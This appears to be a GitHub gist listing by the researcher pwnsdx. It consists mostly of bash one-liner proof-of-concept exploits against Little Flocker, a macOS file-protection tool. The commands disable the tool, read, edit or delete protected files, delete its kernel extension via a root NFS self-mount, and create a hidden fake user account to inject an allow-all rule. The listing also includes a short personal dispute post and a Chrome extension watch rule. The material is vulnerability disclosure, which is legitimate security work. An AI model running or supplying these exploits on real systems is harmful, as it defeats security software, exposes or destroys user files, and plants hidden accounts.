Sabri pwnsdx

pwnsdx / ff.sh
Last active Aug 17, 2016
Multiple bugs in Little Flocker (previously named FlockFlock) (<=0.0.41)
# Description: FlockFlock's Daemon does not protect flockflock_temp.png from tampering
# Impact: An attacker can use this entry point to do various things like disabling FlockFlock,
# preventing the app icon from showing and even creating or deleting files by replacing
# them with a fancy icon!
# Severity: Very High
# Info: && echo "" > /Users/sabri/.t; is just here to trigger a popup and is not required
# (except for "Disable FlockFlock by deleting default config and user config .flockflockrc
# file").
pwnsdx / ff.sh
Last active Aug 18, 2016
Pwn Little Flocker in 1 Bash line? Challenge accepted! (previously named FlockFlock) (<=0.0.36)
# View/Edit .flockflockrc
cd $HOME && __FILE=".flockflockrc"; ln -v "$__FILE" "/tmp/$__FILE"
# View/Edit the first file in the Desktop folder
cd $HOME/Desktop/ && __FILE=$(ls -p | grep -v / | sort -n | head -1); ln -v "$__FILE" "/tmp/$__FILE"
pwnsdx / ff.sh
Last active Aug 29, 2016
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
# Delete a file (unprivileged)
FILETODELETE="$HOME/Desktop/test/com.evilcorp.plist"; /System/Library/PrivateFrameworks/oncrpc.framework/bin/rpcgen --xdr --output $FILETODELETE
pwnsdx / ff.sh
Last active Jan 7, 2017
Critical vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.45)
# Access, modify or delete any files on the hard drive (except SIP'ed files of course)
sudo rm -rf /etc/exports && echo "/ -alldirs -mapall=root localhost" | sudo tee -a /etc/exports && sudo launchctl start com.apple.rpcbind && sudo nfsd disable && sudo nfsd start && sudo mkdir -p /tmp/.pwned && sudo mount localhost:/ /tmp/.pwned && cd /tmp/.pwned
# Or just delete Little Flocker kext?
sudo rm -rf /etc/exports && echo "/ -alldirs -mapall=root localhost" | sudo tee -a /etc/exports && sudo launchctl start com.apple.rpcbind && sudo nfsd disable && sudo nfsd start && sudo mkdir -p /tmp/.pwned && sudo mount localhost:/ /tmp/.pwned && cd /tmp/.pwned && rm -rf /tmp/.pwned/Library/Extensions/LittleFlocker.kext/Contents/MacOS/LittleFlocker
pwnsdx / response.txt
Last active Jul 23, 2017
Response to the new shitty pastebin regarding me
Hello,
Here is the last discussion I had with him (he dared mention me on a 10-day-old topic, and then, when I give arguments on the very same topic or reply to his attacks, I "harass" him): https://github.com/drduh/OS-X-Security-and-Privacy-Guide/pull/128
So I’m going to do this really fast to prevent another blog post from happening again and wasting even more time.
Jonathan recycled an old pastebin he made to do some propaganda against me (https://twitter.com/pwnsdx/status/770353299140771840), so I'm going to clarify this here, point by point:
Diff between both pastebins: https://i.imgur.com/TRqgn5g.png
pwnsdx / ff.sh
Last active May 31, 2018
Disarm Little Flocker silently (<=0.1.1)
# Disarm Little Flocker silently (privileged)
FAKEUSER=pwned$(grep -m1 -ao '[0-9][0-9]' /dev/urandom | sed s/10/99/ | head -n1); echo "Creating fake user account..." && dscl . -create /Users/$FAKEUSER IsHidden 1 && dscl . -create /Users/$FAKEUSER UserShell /bin/bash && dscl . -create /Users/$FAKEUSER RealName "${FAKEUSER}" && dscl . -create /Users/$FAKEUSER UniqueID "1202" && dscl . -create /Users/$FAKEUSER PrimaryGroupID 80 && echo "Injecting payload..." && echo 'allow prefix "/" "any" rwcm' > /var/empty/.littleflockerrc && sync && echo "Please wait (up to 1 minute)..." && sleep 61 && dscl . -delete /Users/$FAKEUSER && rm -rf /var/empty/.littleflockerrc && echo "Little Flocker is now disarmed" && cd /Users
# UPDATE (0.0.77)
# Still works, broken fix:
# https://github.com/jzdziarski/littleflocker/commit/bcce9cf279eb27b04cf644ecc49fee767f1e0579
# 1. via /Users/Shared
echo "Creating fake user account..." && dscl . -create /Users/Shared IsHidden 1 && dscl . -create /Users/Shared UserShell /bin/bash && dscl . -
pwnsdx / ff.sh
Last active May 31, 2018
High severity vulnerability in Little Flocker (previously named FlockFlock) (>=0.0.71 <=0.0.74)
# Read files (privileged)
DIRTOSEE="$HOME/Desktop/test"; DIRSIZE=$(du -mc "$DIRTOSEE" | grep "total" | cut -d$'\t' -f1 | xargs); DIRNAMEHASH=$(echo "$DIRSIZE$DIRTOSEE$(date +%s)" | /usr/bin/openssl sha1); sudo /usr/bin/hdiutil create -ov -size $(($DIRSIZE+1))m -nospotlight -noanyowners -skipunreadable -srcowners off -format UDRO -fs HFS+ -volname .$DIRNAMEHASH -srcfolder "$DIRTOSEE" /tmp/.$DIRNAMEHASH.dmg && hdiutil attach -readonly -noverify -noautofsck -noautoopen -mountpoint /private/tmp/.$DIRNAMEHASH /private/tmp/.$DIRNAMEHASH.dmg && cd /private/tmp/.$DIRNAMEHASH
pwnsdx / ff.sh
Last active Jul 13, 2018
Very high severity vulnerability in Little Flocker (previously named FlockFlock) (<=0.0.74)
# Read files (unprivileged)
DIRTOSEE="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOSEE; $(find $DIRTOSEE -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOSEE /tmp/prepwn$DIRTOSEE && cp -R /tmp/prepwn$DIRTOSEE /tmp/pwned$(dirname $DIRTOSEE) && $(find /tmp/prepwn$DIRTOSEE -exec sh -c 'if [ -d "/tmp/prepwn$1" ]; then mkdir -p "$1"; fi; touch -f "$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove /tmp/prepwn$DIRTOSEE $DIRTOSEE; rm -rf /tmp/prepwn
# Edit/Add files (unprivileged)
DIRTOEDIT="$HOME/Desktop/test"; mkdir -p /tmp/pwned$DIRTOEDIT; $(find $DIRTOEDIT -exec sh -c 'if [ -d "$1" ]; then mkdir -p "/tmp/prepwn$1"; fi; touch -f "/tmp/prepwn$1"' _ {} \;); /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/shove $DIRTOEDIT /tmp/prepwn$DIRTOEDIT && cp -R /tmp/prepwn$DIRTOEDIT /tmp/pwned$(dirname $DIRTOEDIT)
pwnsdx / ff.sh
Last active Dec 13, 2018
Multiple low severity issues in Little Flocker (<=0.3.1)
# - An attacker can prevent the agent from showing the app icon (via /dev/null)
mknod /tmp/LittleFlockerTemp.png c 1 3
# - A file with a long name can hide buttons when the popup appears
touch $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
nano $(printf '\r%.0s' {1..254})$(printf "\x00\x02")
# - Little Flocker does not watch every startup folder/file; therefore an
# attacker can create startup items in these places (thanks Patrick Wardle):
pwnsdx / Google Chrome Extension Watcher.flock
Last active Dec 22, 2018
Google Chrome Extension Watcher.flock
watch prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "any" wcxm
allow prefix "$HOME/Library/Application Support/Google/Chrome/Default/Extensions/" "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" r